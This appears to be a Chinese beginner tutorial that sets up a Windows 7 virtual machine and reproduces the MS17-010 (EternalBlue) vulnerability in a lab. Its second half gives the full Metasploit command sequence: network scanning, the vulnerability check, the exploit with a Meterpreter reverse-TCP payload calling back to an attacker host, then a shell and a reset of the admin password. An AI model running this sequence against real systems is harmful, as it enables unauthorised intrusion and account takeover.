MS17-010漏洞复现(带win7虚拟机安装,零基础)
WIN7虛擬機安裝
1.先下載win7原裝鏡像
MSDN, 我告訴你 - 做一個安靜的工具站
然后打開VM,把虛擬機安裝進來
1.選擇自定義(高級)
?2.選擇默認的
3.選擇稍后安裝系統
4.選擇windows操作系統和 Win7版本
5.選擇合適位置
?6.選擇BIOS
?7.選擇處理器數量
?8.選擇內存大小
?9.選擇網絡類型為NET
之后都選擇默認就可以了
10.
成功完成基礎設置
在CD/DVD中選擇我們之前下載的鏡像文件
1.
?2.
點擊確定開機
?然后點擊安裝
點擊接受和下一步
?點擊自定義(高級)
?
?等待完成安裝重啟
取名為admin
?隨便輸入一個密碼,不記得都可以
跳過
?使用推薦配置,家庭網絡?
?成功進入后重啟
?開始復現永恒之藍漏洞(裝好win7 64位可以直接跳到這一步)
1、掃描局域網內的C段主機(主機發現)
輸入命令:
nmap -sP 192.168.159.1/24得到主機ip
為
192.168.159.1412、掃描端口獲得運行的服務
nmap:
nmap -p 1-65535 -A 192.168.159.141masscan:
masscan --rate=10000 -p1-65535 192.168.159.141?掃描到開放了445端口,而永恒之藍利用的就是445端口的smb服務,操作系統溢出漏洞,這代表我們可能可以利用永恒之藍漏洞
?3.進入MSF控制臺
命令:
msfconsole尋找永恒之藍漏洞:
search ms17-0103是永恒之藍掃描模塊,探測主機是否存在永恒之藍的漏洞
1是永恒之藍的攻擊模塊,借此攻擊目標用戶
我們先要掃描目標是否存在永恒之漏洞
輸入命令
use 3或者
use auxiliary/scanner/smb/smb_ms17_010?然后查看該模塊所需要的參數配置?
show options?若Required欄為yes則代表該參數需要填寫
設置RHOST(攻擊目標的ip)
set rhosts 192.168.159.141執行掃描?
run?Host is likely VULNERABLE to MS17-010
顯示主機很可能能夠會受到永恒之藍漏洞的攻擊,代表我們現在可以攻擊
開始攻擊
使用攻擊模塊:
use 1設置payload
set payload windows/x64/meterpreter/reverse_tcp查看需要配置參數
show options設置目標攻擊ip(Win7主機的ip)?
set rhosts 192.168.159.141設置接受shell的ip(攻擊機ip,kali的ip)?
set LHOST 192.168.159.88執行攻擊
run成功拿到權限
查看系統版本
sysinfo?修改密碼
shell顯示本地計算機的所有用戶帳戶列表:
net user該命令用于增加或修改系統用戶,以及查看它們的信息。
修改密碼
net user admin 新密碼
net user admin 123456?成功用123456登入
?到這里就完成了基礎的滲透
總結
以上是生活随笔為你收集整理的MS17-010漏洞复现(带win7虚拟机安装,零基础)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 解决Tomcat 乱码问题简洁版
- 下一篇: matlab比较判断简写,MATLAB一